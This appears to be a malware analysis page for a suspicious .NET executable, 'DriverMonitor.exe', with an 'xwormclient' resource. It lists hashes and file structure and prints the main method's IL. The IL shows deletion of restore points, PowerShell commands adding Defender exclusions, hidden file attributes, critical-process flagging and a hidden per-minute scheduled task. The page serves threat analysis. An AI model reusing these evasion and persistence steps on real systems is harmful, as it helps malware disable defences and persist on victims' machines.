Suspicious
Suspect

1851dc48b25b34d01dce54dd74e1a7f0

PE Executable
|
MD5: 1851dc48b25b34d01dce54dd74e1a7f0
|
Size: 237.57 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Low

Hash
 Hash Value
MD5
1851dc48b25b34d01dce54dd74e1a7f0
Sha1
ba240969db2c865063a75f8186f2fc83860d52ae
Sha256
a21ea3be11dab8ff00566411bca41ea6c635ac29ed71bca8274da560387701c9
Sha384
777d50b93b6dff8d79f1cafb085901542eddc54c5bb0b6b0297be673b435c9bcd0a01ea001ce5e13786ea8d9fc25a0f6
Sha512
8f394bfa2f2b325f2ab38c0a5894db77934e9737a4a18a19b08eaefffbd861bb4f8b5fc4de7ff70704da05eb8493ee4de6283ee513ccd3d898412221b4aba450
SSDeep
3072:ZgtSlj8czn5FQ7DgOsctA/qFQBEHBAnpK37nXN8t005Q5cvPsE74tyJhbSKsIS0g:0Sr5FI8Od0q98PnvPzkgm5jwzXR9
TLSH
1B346C112BF8C92BEBBF5BB5E0B112102774E10BA561EB4A388C25F95B233415D527BF
File Structure
1851dc48b25b34d01dce54dd74e1a7f0
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
fwybnjppcwzrwu.Resources
xwormclient
Microsoft.Win32.TaskScheduler.Properties.Resources.resources
Microsoft.Win32.TaskScheduler.V1.TaskSchedulerV1Schema.xsd
Microsoft.Win32.TaskScheduler.TaskService.bmp
Informations
Name
 Value
Module Name

DriverMonitor.exe
Full Name

DriverMonitor.exe
EntryPoint

System.Void Program::main()
Scope Name

DriverMonitor.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

DriverMonitor
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

520
Main Method

System.Void Program::main()
Main IL Instruction Count

272
Main IL

call System.Boolean Program::CreateMutex() brtrue IL_0010: ldsfld System.String Settings::Current ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.String Settings::Current ldsfld System.String Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.0 <null> call System.Int32 Microsoft.VisualBasic.CompilerServices.Operators::CompareString(System.String,System.String,System.Boolean) ldc.i4.0 <null> bne.un IL_00F6: call System.Boolean Program::AdminCheck() call System.Void Program::PreventSleep() ldnull <null> ldftn System.Void Program::TaskSchedulerKill() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.0 <null> ldloc.0 <null> callvirt System.Void System.Threading.Thread::Start() ldnull <null> ldftn System.Void Program::SuperHidden() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldsfld System.Collections.Generic.List`1<System.String> Settings::List callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.2 <null> br IL_00A7: ldloca.s V_2 ldloca.s V_2 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.3 <null> ldnull <null> ldftn System.Void Program::Memory(System.Object) newobj System.Void System.Threading.ParameterizedThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ParameterizedThreadStart) stloc.s V_4 ldloc.s V_4 ldloc.3 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Byte[] Program::GetTheResource(System.String) callvirt System.Void System.Threading.Thread::Start(System.Object) ldloca.s V_2 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_007A: ldloca.s V_2 leave IL_00C3: call System.Boolean Program::AdminCheck() ldloca.s V_2 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> call System.Boolean Program::AdminCheck() brfalse IL_00D2: ldnull call System.Void ProcessCritical::CriticalProcess_Enable() ldnull <null> ldftn System.Void Program::CAntiKill() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.s V_5 ldloc.s V_5 callvirt System.Void System.Threading.Thread::Start() call System.Void System.Windows.Forms.Application::Run() br IL_0417: ret call System.Boolean Program::AdminCheck() brtrue IL_0116: call System.Boolean Program::AdminCheck() ldsfld System.String Settings::Current call System.Boolean Program::Execute(System.String) pop <null> call System.Void Program::CloseMutex() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Boolean Program::AdminCheck() brfalse IL_01B4: call System.Boolean Program::AdminCheck() ldstr \\.\root\default ldstr systemrestore newobj System.Void System.Management.ObjectGetOptions::.ctor() newobj System.Void System.Management.ManagementClass::.ctor(System.String,System.String,System.Management.ObjectGetOptions) stloc.s V_6 ldloc.s V_6 callvirt System.Management.ManagementObjectCollection System.Management.ManagementClass::GetInstances() stloc.s V_7 ldloc.s V_7 callvirt System.Management.ManagementObjectCollection/ManagementObjectEnumerator System.Management.ManagementObjectCollection::GetEnumerator() stloc.s V_8 br IL_0180: ldloc.s V_8 ldloc.s V_8 callvirt System.Management.ManagementBaseObject System.Management.ManagementObjectCollection/ManagementObjectEnumerator::get_Current() castclass System.Management.ManagementObject stloc.s V_9 ldloc.s V_9 ldstr sequencenumber callvirt System.Object System.Management.ManagementBaseObject::get_Item(System.String) call System.UInt32 Microsoft.VisualBasic.CompilerServices.Conversions::ToUInteger(System.Object) stloc.s V_10 ldloca.s V_10 call System.String System.UInt32::ToString() call System.Int32 Microsoft.VisualBasic.CompilerServices.Conversions::ToInteger(System.String) call System.Int32 Program::SRRemoveRestorePoint(System.Int32) pop <null> ldloc.s V_8 callvirt System.Boolean System.Management.ManagementObjectCollection/ManagementObjectEnumerator::MoveNext() brtrue.s IL_014D: ldloc.s V_8 leave IL_019D: leave IL_01B4 ldloc.s V_8 brfalse IL_019C: endfinally ldloc.s V_8 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_01B4: call System.Boolean Program::AdminCheck() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_01B4: call System.Boolean Program::AdminCheck() call System.Boolean Program::AdminCheck() brfalse IL_0252: ldsfld System.String Settings::Workpath newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_12 ldloc.s V_12 ldstr powershell.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_12 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_12 ldstr -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath ' ldsfld System.String Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) call System.String System.IO.Path::GetFullPath(System.String) ldstr ' call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_12 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_12 ldstr -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess ' ldsfld System.String Settings::HName ldstr ' call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_12 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() leave IL_0252: ldsfld System.String Settings::Workpath dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_13 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0252: ldsfld System.String Settings::Workpath ldsfld System.String Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) call System.Boolean System.IO.File::Exists(System.String) brfalse IL_029E: ldc.i4 1000 ldsfld System.String Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_14 ldloc.s V_14 ldc.i4 128 callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) ldloc.s V_14 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) ldsfld System.String Settings::Current call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave IL_02E2: ldsfld System.String Settings::Workpath dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_15 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_02E2: ldsfld System.String Settings::Workpath ldsfld System.String Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave IL_0313: newobj System.Void Microsoft.Win32.TaskScheduler.TaskService::.ctor() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_16 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0313: newobj System.Void Microsoft.Win32.TaskScheduler.TaskService::.ctor() newobj System.Void Microsoft.Win32.TaskScheduler.TaskService::.ctor() stloc.s V_17 ldloc.s V_17 callvirt Microsoft.Win32.TaskScheduler.TaskDefinition Microsoft.Win32.TaskScheduler.TaskService::NewTask() stloc.s V_18 newobj System.Void Microsoft.Win32.TaskScheduler.TimeTrigger::.ctor() stloc.s V_19 ldloc.s V_19 callvirt Microsoft.Win32.TaskScheduler.RepetitionPattern Microsoft.Win32.TaskScheduler.Trigger::get_Repetition() ldc.r8 1 call System.TimeSpan System.TimeSpan::FromMinutes(System.Double) callvirt System.Void Microsoft.Win32.TaskScheduler.RepetitionPattern::set_Interval(System.TimeSpan) ldloc.s V_18 callvirt Microsoft.Win32.TaskScheduler.TriggerCollection Microsoft.Win32.TaskScheduler.TaskDefinition::get_Triggers() ldloc.s V_19 callvirt Microsoft.Win32.TaskScheduler.Trigger Microsoft.Win32.TaskScheduler.TriggerCollection::Add(Microsoft.Win32.TaskScheduler.Trigger) pop <null> call System.Boolean Program::AdminCheck() brfalse IL_036A: ldloc.s V_18 ldloc.s V_18 callvirt Microsoft.Win32.TaskScheduler.TaskPrincipal Microsoft.Win32.TaskScheduler.TaskDefinition::get_Principal() ldc.i4.1 <null> callvirt System.Void Microsoft.Win32.TaskScheduler.TaskPrincipal::set_RunLevel(Microsoft.Win32.TaskScheduler.TaskRunLevel) ldloc.s V_18 callvirt Microsoft.Win32.TaskScheduler.TaskSettings Microsoft.Win32.TaskScheduler.TaskDefinition::get_Settings() ldc.i4.1 <null> callvirt System.Void Microsoft.Win32.TaskScheduler.TaskSettings::set_Hidden(System.Boolean) ldloc.s V_18 callvirt Microsoft.Win32.TaskScheduler.ActionCollection Microsoft.Win32.TaskScheduler.TaskDefinition::get_Actions() ldsfld System.String Settings::Workpath ldstr \ ldsfld System.String Settings::HName call System.String System.String::Concat(System.String,System.String,System.String) ldnull <null> ldnull <null> newobj System.Void Microsoft.Win32.TaskScheduler.ExecAction::.ctor(System.String,System.String,System.String) callvirt Microsoft.Win32.TaskScheduler.Action Microsoft.Win32.TaskScheduler.ActionCollection::Add(Microsoft.Win32.TaskScheduler.Action) pop <null> ldloc.s V_17 callvirt Microsoft.Win32.TaskScheduler.TaskFolder Microsoft.Win32.TaskScheduler.TaskService::get_RootFolder() ldsfld System.String Settings::TaskName ldloc.s V_18 callvirt Microsoft.Win32.TaskScheduler.Task Microsoft.Win32.TaskScheduler.TaskFolder::RegisterTaskDefinition(System.String,Microsoft.Win32.TaskScheduler.TaskDefinition) pop <null> ldc.i4 3000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Void Program::CloseMutex() ldloc.s V_17 ldsfld System.String Settings::TaskName ldc.i4.1 <null> callvirt Microsoft.Win32.TaskScheduler.Task Microsoft.Win32.TaskScheduler.TaskService::FindTask(System.String,System.Boolean) stloc.s V_20 ldloc.s V_20 brfalse IL_03E6: ldc.i4.0 ldloc.s V_20 ldc.i4.0 <null> newarr System.String callvirt Microsoft.Win32.TaskScheduler.RunningTask Microsoft.Win32.TaskScheduler.Task::Run(System.String[]) pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) leave IL_0400: leave IL_0417 ldloc.s V_17 brfalse IL_03FF: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_0417: ret dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_21 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0417: ret ret <null>
1851dc48b25b34d01dce54dd74e1a7f0 (237.57 KB)
File Structure
1851dc48b25b34d01dce54dd74e1a7f0
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
fwybnjppcwzrwu.Resources
xwormclient
Microsoft.Win32.TaskScheduler.Properties.Resources.resources
Microsoft.Win32.TaskScheduler.V1.TaskSchedulerV1Schema.xsd
Microsoft.Win32.TaskScheduler.TaskService.bmp
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙